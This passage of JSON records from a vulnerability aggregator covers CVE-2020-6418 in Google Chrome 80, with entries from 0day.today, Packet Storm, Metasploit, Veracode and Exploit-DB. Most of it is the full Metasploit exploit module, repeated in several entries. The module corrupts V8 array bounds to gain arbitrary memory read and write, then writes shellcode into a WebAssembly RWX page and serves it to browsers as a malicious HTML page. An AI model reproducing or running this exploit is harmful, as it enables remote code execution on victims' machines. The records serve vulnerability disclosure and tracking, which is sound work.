datastore['DEBUG_EXPLOIT']\n debugjs = %Q^\nprint = function(arg) {\n var request = new XMLHttpRequest();\n request.open(\"POST\", \"/print\", false);\n request.send(\"\" + arg);\n};\n^\n jscript = \"#{debugjs}#{jscript}\"\n else\n jscript.gsub!(/\\/\\/.*$/, '') # strip comments\n jscript.gsub!(/^\\s*print\\s*\$.*?\$;\\s*$/, '') # strip print(*);\n end\n\n html = %Q^\n<html>\n<head>\n<script>\n#{jscript}\n</script>\n</head>\n<body>\n</body>\n</html>\n ^\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34056", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-03-05T22:51:46", "description": "", "cvss3": {}, "published": "2020-03-05T00:00:00", "type": "packetstorm", "title": "Google Chrome 80 JSCreate Side-Effect Type Confusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-6418"], "modified": "2020-03-05T00:00:00", "id": "PACKETSTORM:156632", "href": "https://packetstormsecurity.com/files/156632/Google-Chrome-80-JSCreate-Side-Effect-Type-Confusion.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Google Chrome 80 JSCreate side-effect type confusion exploit', \n'Description' => %q{ \nThis module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit \ncorrupts the length of a float array (float_rel), which can then be used for out \nof bounds read and write on adjacent memory. \nThe relative read and write is then used to modify a UInt64Array (uint64_aarw) \nwhich is used for read and writing from absolute memory. \nThe exploit then uses WebAssembly in order to allocate a region of RWX memory, \nwhich is then replaced with the payload shellcode. \nThe payload is executed within the sandboxed renderer process, so the browser \nmust be run with the --no-sandbox option for the payload to work correctly. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Cl\u00e9ment Lecigne', # discovery \n'Istv\u00e1n Kurucsai', # exploit \n'Vignesh S Rao', # exploit \n'timwr', # metasploit copypasta \n], \n'References' => [ \n['CVE', '2020-6418'], \n['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1053604'], \n['URL', 'https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping'], \n['URL', 'https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90'], \n], \n'Arch' => [ ARCH_X64 ], \n'DefaultTarget' => 0, \n'Targets' => \n[ \n['Windows 10 - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'win'}], \n['macOS - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'osx'}], \n], \n'DisclosureDate' => 'Feb 19 2020')) \nregister_advanced_options([ \nOptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]), \n]) \nend \n \ndef on_request_uri(cli, request) \nif datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*} \nprint_status(\"[*] #{request.body}\") \nsend_response(cli, '') \nreturn \nend \n \nprint_status(\"Sending #{request.uri} to #{request['User-Agent']}\") \nescaped_payload = Rex::Text.to_unescape(payload.raw) \njscript = %Q^ \nvar shellcode = unescape(\"#{escaped_payload}\"); \n \n// HELPER FUNCTIONS \nlet conversion_buffer = new ArrayBuffer(8); \nlet float_view = new Float64Array(conversion_buffer); \nlet int_view = new BigUint64Array(conversion_buffer); \nBigInt.prototype.hex = function() { \nreturn '0x' + this.toString(16); \n}; \nBigInt.prototype.i2f = function() { \nint_view[0] = this; \nreturn float_view[0]; \n} \nBigInt.prototype.smi2f = function() { \nint_view[0] = this << 32n; \nreturn float_view[0]; \n} \nNumber.prototype.f2i = function() { \nfloat_view[0] = this; \nreturn int_view[0]; \n} \nNumber.prototype.f2smi = function() { \nfloat_view[0] = this; \nreturn int_view[0] >> 32n; \n} \n \nNumber.prototype.fhw = function() { \nfloat_view[0] = this; \nreturn int_view[0] >> 32n; \n} \n \nNumber.prototype.flw = function() { \nfloat_view[0] = this; \nreturn int_view[0] & BigInt(2**32-1); \n} \n \nNumber.prototype.i2f = function() { \nreturn BigInt(this).i2f(); \n} \nNumber.prototype.smi2f = function() { \nreturn BigInt(this).smi2f(); \n} \n \nfunction hex(a) { \nreturn a.toString(16); \n} \n \n// \n// EXPLOIT \n// \n \n// the number of holes here determines the OOB write offset \nlet vuln = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1]; \nvar float_rel; // float array, initially corruption target \nvar float_carw; // float array, used for reads/writes within the compressed heap \nvar uint64_aarw; // uint64 typed array, used for absolute reads/writes in the entire address space \nvar obj_leaker; // used to implement addrof \nvuln.pop(); \nvuln.pop(); \nvuln.pop(); \n \nfunction empty() {} \n \nfunction f(nt) { \n// The compare operation enforces an effect edge between JSCreate and Array.push, thus introducing the bug \nvuln.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 0.2 : 156842065920.05); \nfor (var i = 0; i < 0x10000; ++i) {}; \n} \n \nlet p = new Proxy(Object, { \nget: function() { \nvuln[0] = {}; \nfloat_rel = [0.2, 1.2, 2.2, 3.2, 4.3]; \nfloat_carw = [6.6]; \nuint64_aarw = new BigUint64Array(4); \nobj_leaker = { \na: float_rel, \nb: float_rel, \n}; \n \nreturn Object.prototype; \n} \n}); \n \nfunction main(o) { \nfor (var i = 0; i < 0x10000; ++i) {}; \nreturn f(o); \n} \n \n// reads 4 bytes from the compressed heap at the specified dword offset after float_rel \nfunction crel_read4(offset) { \nvar qw_offset = Math.floor(offset / 2); \nif (offset & 1 == 1) { \nreturn float_rel[qw_offset].fhw(); \n} else { \nreturn float_rel[qw_offset].flw(); \n} \n} \n \n// writes the specified 4-byte BigInt value to the compressed heap at the specified offset after float_rel \nfunction crel_write4(offset, val) { \nvar qw_offset = Math.floor(offset / 2); \n// we are writing an 8-byte double under the hood \n// read out the other half and keep its value \nif (offset & 1 == 1) { \ntemp = float_rel[qw_offset].flw(); \nnew_val = (val << 32n | temp).i2f(); \nfloat_rel[qw_offset] = new_val; \n} else { \ntemp = float_rel[qw_offset].fhw(); \nnew_val = (temp << 32n | val).i2f(); \nfloat_rel[qw_offset] = new_val; \n} \n} \n \nconst float_carw_elements_offset = 0x14; \n \nfunction cabs_read4(caddr) { \nelements_addr = caddr - 8n | 1n; \ncrel_write4(float_carw_elements_offset, elements_addr); \nprint('cabs_read4: ' + hex(float_carw[0].f2i())); \nres = float_carw[0].flw(); \n// TODO restore elements ptr \nreturn res; \n} \n \n \n// This function provides arbitrary within read the compressed heap \nfunction cabs_read8(caddr) { \nelements_addr = caddr - 8n | 1n; \ncrel_write4(float_carw_elements_offset, elements_addr); \nprint('cabs_read8: ' + hex(float_carw[0].f2i())); \nres = float_carw[0].f2i(); \n// TODO restore elements ptr \nreturn res; \n} \n \n// This function provides arbitrary write within the compressed heap \nfunction cabs_write4(caddr, val) { \nelements_addr = caddr - 8n | 1n; \n \ntemp = cabs_read4(caddr + 4n | 1n); \nprint('cabs_write4 temp: '+ hex(temp)); \n \nnew_val = (temp << 32n | val).i2f(); \n \ncrel_write4(float_carw_elements_offset, elements_addr); \nprint('cabs_write4 prev_val: '+ hex(float_carw[0].f2i())); \n \nfloat_carw[0] = new_val; \n// TODO restore elements ptr \nreturn res; \n} \n \nconst objleaker_offset = 0x41; \nfunction addrof(o) { \nobj_leaker.b = o; \naddr = crel_read4(objleaker_offset) & BigInt(2**32-2); \nobj_leaker.b = {}; \nreturn addr; \n} \n \nconst uint64_externalptr_offset = 0x1b; // in 8-bytes \n \n// Arbitrary read. We corrupt the backing store of the `uint64_aarw` array and then read from the array \nfunction read8(addr) { \nfaddr = addr.i2f(); \nt1 = float_rel[uint64_externalptr_offset]; \nt2 = float_rel[uint64_externalptr_offset + 1]; \nfloat_rel[uint64_externalptr_offset] = faddr; \nfloat_rel[uint64_externalptr_offset + 1] = 0.0; \n \nval = uint64_aarw[0]; \n \nfloat_rel[uint64_externalptr_offset] = t1; \nfloat_rel[uint64_externalptr_offset + 1] = t2; \nreturn val; \n} \n \n// Arbitrary write. We corrupt the backing store of the `uint64_aarw` array and then write into the array \nfunction write8(addr, val) { \nfaddr = addr.i2f(); \nt1 = float_rel[uint64_externalptr_offset]; \nt2 = float_rel[uint64_externalptr_offset + 1]; \nfloat_rel[uint64_externalptr_offset] = faddr; \nfloat_rel[uint64_externalptr_offset + 1] = 0.0; \n \nuint64_aarw[0] = val; \n \nfloat_rel[uint64_externalptr_offset] = t1; \nfloat_rel[uint64_externalptr_offset + 1] = t2; \nreturn val; \n} \n \n// Given an array of bigints, this will write all the elements to the address provided as argument \nfunction writeShellcode(addr, sc) { \nfaddr = addr.i2f(); \nt1 = float_rel[uint64_externalptr_offset]; \nt2 = float_rel[uint64_externalptr_offset + 1]; \nfloat_rel[uint64_externalptr_offset - 1] = 10; \nfloat_rel[uint64_externalptr_offset] = faddr; \nfloat_rel[uint64_externalptr_offset + 1] = 0.0; \n \nfor (var i = 0; i < sc.length; ++i) { \nuint64_aarw[i] = sc[i] \n} \n \nfloat_rel[uint64_externalptr_offset] = t1; \nfloat_rel[uint64_externalptr_offset + 1] = t2; \n} \n \n \nfunction get_compressed_rw() { \n \nfor (var i = 0; i < 0x10000; ++i) {empty();} \n \nmain(empty); \nmain(empty); \n \n// Function would be jit compiled now. \nmain(p); \n \nprint(`Corrupted length of float_rel array = ${float_rel.length}`); \n} \n \nfunction get_arw() { \nget_compressed_rw(); \nprint('should be 0x2: ' + hex(crel_read4(0x15))); \nlet previous_elements = crel_read4(0x14); \n//print(hex(previous_elements)); \n//print(hex(cabs_read4(previous_elements))); \n//print(hex(cabs_read4(previous_elements + 4n))); \ncabs_write4(previous_elements, 0x66554433n); \n//print(hex(cabs_read4(previous_elements))); \n//print(hex(cabs_read4(previous_elements + 4n))); \n \nprint('addrof(float_rel): ' + hex(addrof(float_rel))); \nuint64_aarw[0] = 0x4142434445464748n; \n} \n \nfunction rce() { \nfunction get_wasm_func() { \nvar importObject = { \nimports: { imported_func: arg => print(arg) } \n}; \nbc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb]; \nwasm_code = new Uint8Array(bc); \nwasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject); \nreturn wasm_mod.exports.exported_func; \n} \n \nlet wasm_func = get_wasm_func(); \n// traverse the JSFunction object chain to find the RWX WebAssembly code page \nlet wasm_func_addr = addrof(wasm_func); \nlet sfi = cabs_read4(wasm_func_addr + 12n) - 1n; \nprint('sfi: ' + hex(sfi)); \nlet WasmExportedFunctionData = cabs_read4(sfi + 4n) - 1n; \nprint('WasmExportedFunctionData: ' + hex(WasmExportedFunctionData)); \n \nlet instance = cabs_read4(WasmExportedFunctionData + 8n) - 1n; \nprint('instance: ' + hex(instance)); \n \nlet wasm_rwx_addr = cabs_read8(instance + 0x68n); \nprint('wasm_rwx_addr: ' + hex(wasm_rwx_addr)); \n \n// write the shellcode to the RWX page \nwhile(shellcode.length % 4 != 0){ \nshellcode += \"\\u9090\"; \n} \n \nlet sc = []; \n \n// convert the shellcode to BigInt \nfor (let i = 0; i < shellcode.length; i += 4) { \nsc.push(BigInt(shellcode.charCodeAt(i)) + BigInt(shellcode.charCodeAt(i + 1) * 0x10000) + BigInt(shellcode.charCodeAt(i + 2) * 0x100000000) + BigInt(shellcode.charCodeAt(i + 3) * 0x1000000000000)); \n} \n \nwriteShellcode(wasm_rwx_addr,sc); \n \nprint('success'); \nwasm_func(); \n} \n \n \nfunction exp() { \nget_arw(); \nrce(); \n} \n \nexp(); \n^ \n \nif datastore['DEBUG_EXPLOIT'] \ndebugjs = %Q^ \nprint = function(arg) { \nvar request = new XMLHttpRequest(); \nrequest.open(\"POST\", \"/print\", false); \nrequest.send(\"\" + arg); \n}; \n^ \njscript = \"#{debugjs}#{jscript}\" \nelse \njscript.gsub!(/\\/\\/.*$/, '') # strip comments \njscript.gsub!(/^\\s*print\\s*\$.*?\$;\\s*$/, '') # strip print(*); \nend \n \nhtml = %Q^ \n<html> \n<head> \n<script> \n#{jscript} \n</script> \n</head> \n<body> \n</body> \n</html> \n^ \nsend_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'}) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156632/chrome_jscreate_sideeffect.rb.txt", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "metasploit": [{"lastseen": "2022-11-03T04:47:40", "description": "This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit corrupts the length of a float array (float_rel), which can then be used for out of bounds read and write on adjacent memory. The relative read and write is then used to modify a UInt64Array (uint64_aarw) which is used for read and writing from absolute memory. The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode. The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.\n", "cvss3": {}, "published": "2020-02-29T10:41:04", "type": "metasploit", "title": "Google Chrome 80 JSCreate side-effect type confusion exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-6418"], "modified": "2022-02-16T11:48:55", "id": "MSF:EXPLOIT-MULTI-BROWSER-CHROME_JSCREATE_SIDEEFFECT-", "href": "https://www.rapid7.com/db/modules/exploit/multi/browser/chrome_jscreate_sideeffect/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::Remote::HttpServer::BrowserExploit\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Google Chrome 80 JSCreate side-effect type confusion exploit',\n 'Description' => %q{\n This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit\n corrupts the length of a float array (float_rel), which can then be used for out\n of bounds read and write on adjacent memory.\n The relative read and write is then used to modify a UInt64Array (uint64_aarw)\n which is used for read and writing from absolute memory.\n The exploit then uses WebAssembly in order to allocate a region of RWX memory,\n which is then replaced with the payload shellcode.\n The payload is executed within the sandboxed renderer process, so the browser\n must be run with the --no-sandbox option for the payload to work correctly.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Cl\u00e9ment Lecigne', # discovery\n 'Istv\u00e1n Kurucsai', # exploit\n 'Vignesh S Rao', # exploit\n 'timwr', # metasploit copypasta\n ],\n 'References' => [\n ['CVE', '2020-6418'],\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1053604'],\n ['URL', 'https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping'],\n ['URL', 'https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90'],\n ],\n 'Arch' => [ ARCH_X64 ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'SideEffects' => [ IOC_IN_LOGS ],\n 'Stability' => [CRASH_SAFE]\n },\n 'Targets' =>\n [\n ['Windows 10 - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'win'}],\n ['macOS - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'osx'}],\n ],\n 'DisclosureDate' => '2020-02-19'))\n end\n\n def on_request_uri(cli, request)\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\n escaped_payload = Rex::Text.to_unescape(payload.raw)\n jscript = %Q^\nvar shellcode = unescape(\"#{escaped_payload}\");\n\n// HELPER FUNCTIONS\nlet conversion_buffer = new ArrayBuffer(8);\nlet float_view = new Float64Array(conversion_buffer);\nlet int_view = new BigUint64Array(conversion_buffer);\nBigInt.prototype.hex = function() {\n return '0x' + this.toString(16);\n};\nBigInt.prototype.i2f = function() {\n int_view[0] = this;\n return float_view[0];\n}\nBigInt.prototype.smi2f = function() {\n int_view[0] = this << 32n;\n return float_view[0];\n}\nNumber.prototype.f2i = function() {\n float_view[0] = this;\n return int_view[0];\n}\nNumber.prototype.f2smi = function() {\n float_view[0] = this;\n return int_view[0] >> 32n;\n}\n\nNumber.prototype.fhw = function() {\n float_view[0] = this;\n return int_view[0] >> 32n;\n}\n\nNumber.prototype.flw = function() {\n float_view[0] = this;\n return int_view[0] & BigInt(2**32-1);\n}\n\nNumber.prototype.i2f = function() {\n return BigInt(this).i2f();\n}\nNumber.prototype.smi2f = function() {\n return BigInt(this).smi2f();\n}\n\nfunction hex(a) {\n return a.toString(16);\n}\n\n//\n// EXPLOIT\n//\n\n// the number of holes here determines the OOB write offset\nlet vuln = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1];\nvar float_rel; // float array, initially corruption target\nvar float_carw; // float array, used for reads/writes within the compressed heap\nvar uint64_aarw; // uint64 typed array, used for absolute reads/writes in the entire address space\nvar obj_leaker; // used to implement addrof\nvuln.pop();\nvuln.pop();\nvuln.pop();\n\nfunction empty() {}\n\nfunction f(nt) {\n // The compare operation enforces an effect edge between JSCreate and Array.push, thus introducing the bug\n vuln.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 0.2 : 156842065920.05);\n for (var i = 0; i < 0x10000; ++i) {};\n}\n\nlet p = new Proxy(Object, {\n get: function() {\n vuln[0] = {};\n float_rel = [0.2, 1.2, 2.2, 3.2, 4.3];\n float_carw = [6.6];\n uint64_aarw = new BigUint64Array(4);\n obj_leaker = {\n a: float_rel,\n b: float_rel,\n };\n\n return Object.prototype;\n }\n});\n\nfunction main(o) {\n for (var i = 0; i < 0x10000; ++i) {};\n return f(o);\n}\n\n// reads 4 bytes from the compressed heap at the specified dword offset after float_rel\nfunction crel_read4(offset) {\n var qw_offset = Math.floor(offset / 2);\n if (offset & 1 == 1) {\n return float_rel[qw_offset].fhw();\n } else {\n return float_rel[qw_offset].flw();\n }\n}\n\n// writes the specified 4-byte BigInt value to the compressed heap at the specified offset after float_rel\nfunction crel_write4(offset, val) {\n var qw_offset = Math.floor(offset / 2);\n // we are writing an 8-byte double under the hood\n // read out the other half and keep its value\n if (offset & 1 == 1) {\n temp = float_rel[qw_offset].flw();\n new_val = (val << 32n | temp).i2f();\n float_rel[qw_offset] = new_val;\n } else {\n temp = float_rel[qw_offset].fhw();\n new_val = (temp << 32n | val).i2f();\n float_rel[qw_offset] = new_val;\n }\n}\n\nconst float_carw_elements_offset = 0x14;\n\nfunction cabs_read4(caddr) {\n elements_addr = caddr - 8n | 1n;\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_read4: ' + hex(float_carw[0].f2i()));\n res = float_carw[0].flw();\n // TODO restore elements ptr\n return res;\n}\n\n\n// This function provides arbitrary within read the compressed heap\nfunction cabs_read8(caddr) {\n elements_addr = caddr - 8n | 1n;\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_read8: ' + hex(float_carw[0].f2i()));\n res = float_carw[0].f2i();\n // TODO restore elements ptr\n return res;\n}\n\n// This function provides arbitrary write within the compressed heap\nfunction cabs_write4(caddr, val) {\n elements_addr = caddr - 8n | 1n;\n\n temp = cabs_read4(caddr + 4n | 1n);\n print('cabs_write4 temp: '+ hex(temp));\n\n new_val = (temp << 32n | val).i2f();\n\n crel_write4(float_carw_elements_offset, elements_addr);\n print('cabs_write4 prev_val: '+ hex(float_carw[0].f2i()));\n\n float_carw[0] = new_val;\n // TODO restore elements ptr\n return res;\n}\n\nconst objleaker_offset = 0x41;\nfunction addrof(o) {\n obj_leaker.b = o;\n addr = crel_read4(objleaker_offset) & BigInt(2**32-2);\n obj_leaker.b = {};\n return addr;\n}\n\nconst uint64_externalptr_offset = 0x1b; // in 8-bytes\n\n// Arbitrary read. We corrupt the backing store of the `uint64_aarw` array and then read from the array\nfunction read8(addr) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n val = uint64_aarw[0];\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n return val;\n}\n\n// Arbitrary write. We corrupt the backing store of the `uint64_aarw` array and then write into the array\nfunction write8(addr, val) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n uint64_aarw[0] = val;\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n return val;\n}\n\n// Given an array of bigints, this will write all the elements to the address provided as argument\nfunction writeShellcode(addr, sc) {\n faddr = addr.i2f();\n t1 = float_rel[uint64_externalptr_offset];\n t2 = float_rel[uint64_externalptr_offset + 1];\n float_rel[uint64_externalptr_offset - 1] = 10;\n float_rel[uint64_externalptr_offset] = faddr;\n float_rel[uint64_externalptr_offset + 1] = 0.0;\n\n for (var i = 0; i < sc.length; ++i) {\n uint64_aarw[i] = sc[i]\n }\n\n float_rel[uint64_externalptr_offset] = t1;\n float_rel[uint64_externalptr_offset + 1] = t2;\n}\n\n\nfunction get_compressed_rw() {\n\n for (var i = 0; i < 0x10000; ++i) {empty();}\n\n main(empty);\n main(empty);\n\n // Function would be jit compiled now.\n main(p);\n\n print(`Corrupted length of float_rel array = ${float_rel.length}`);\n}\n\nfunction get_arw() {\n get_compressed_rw();\n print('should be 0x2: ' + hex(crel_read4(0x15)));\n let previous_elements = crel_read4(0x14);\n //print(hex(previous_elements));\n //print(hex(cabs_read4(previous_elements)));\n //print(hex(cabs_read4(previous_elements + 4n)));\n cabs_write4(previous_elements, 0x66554433n);\n //print(hex(cabs_read4(previous_elements)));\n //print(hex(cabs_read4(previous_elements + 4n)));\n\n print('addrof(float_rel): ' + hex(addrof(float_rel)));\n uint64_aarw[0] = 0x4142434445464748n;\n}\n\nfunction rce() {\n function get_wasm_func() {\n var importObject = {\n imports: { imported_func: arg => print(arg) }\n };\n bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];\n wasm_code = new Uint8Array(bc);\n wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);\n return wasm_mod.exports.exported_func;\n }\n\n let wasm_func = get_wasm_func();\n // traverse the JSFunction object chain to find the RWX WebAssembly code page\n let wasm_func_addr = addrof(wasm_func);\n let sfi = cabs_read4(wasm_func_addr + 12n) - 1n;\n print('sfi: ' + hex(sfi));\n let WasmExportedFunctionData = cabs_read4(sfi + 4n) - 1n;\n print('WasmExportedFunctionData: ' + hex(WasmExportedFunctionData));\n\n let instance = cabs_read4(WasmExportedFunctionData + 8n) - 1n;\n print('instance: ' + hex(instance));\n\n let wasm_rwx_addr = cabs_read8(instance + 0x68n);\n print('wasm_rwx_addr: ' + hex(wasm_rwx_addr));\n\n // write the shellcode to the RWX page\n while(shellcode.length % 4 != 0){\n shellcode += \"\\u9090\";\n }\n\n let sc = [];\n\n // convert the shellcode to BigInt\n for (let i = 0; i < shellcode.length; i += 4) {\n sc.push(BigInt(shellcode.charCodeAt(i)) + BigInt(shellcode.charCodeAt(i + 1) * 0x10000) + BigInt(shellcode.charCodeAt(i + 2) * 0x100000000) + BigInt(shellcode.charCodeAt(i + 3) * 0x1000000000000));\n }\n\n writeShellcode(wasm_rwx_addr,sc);\n\n print('success');\n wasm_func();\n}\n\n\nfunction exp() {\n get_arw();\n rce();\n}\n\nexp();\n^\n\n jscript = add_debug_print_js(jscript)\n html = %Q^\n<html>\n<head>\n<script>\n#{jscript}\n</script>\n</head>\n<body>\n</body>\n</html>\n ^\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/chrome_jscreate_sideeffect.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "veracode": [{"lastseen": "2022-07-26T16:25:27", "description": "chromium is vulnerable to arbitrary code execution. Incorrect optimization assumptions in V8 allows a remote attacker to execute arbitrary code inside a sandbox via a malicious HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-06T03:06:35", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5782"], "modified": "2020-12-10T08:48:07", "id": "VERACODE:28130", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-28130/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T06:07:32", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-09T00:00:00", "type": "exploitdb", "title": "Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-6418", "CVE-2020-6418"], "modified": "2020-03-09T00:00:00", "id": "EDB-ID:48186", "href": "https://www.exploit-db.com/exploits/48186", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Google Chrome 80 JSCreate side-effect type confusion exploit',\r\n 'Description' => %q{\r\n This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit\r\n corrupts the length of a float array (float_rel), which can then be used for out\r\n of bounds read and write on adjacent memory.\r\n The relative read and write is then used to modify a UInt64Array (uint64_aarw)\r\n which is used for read and writing from absolute memory.\r\n The exploit then uses WebAssembly 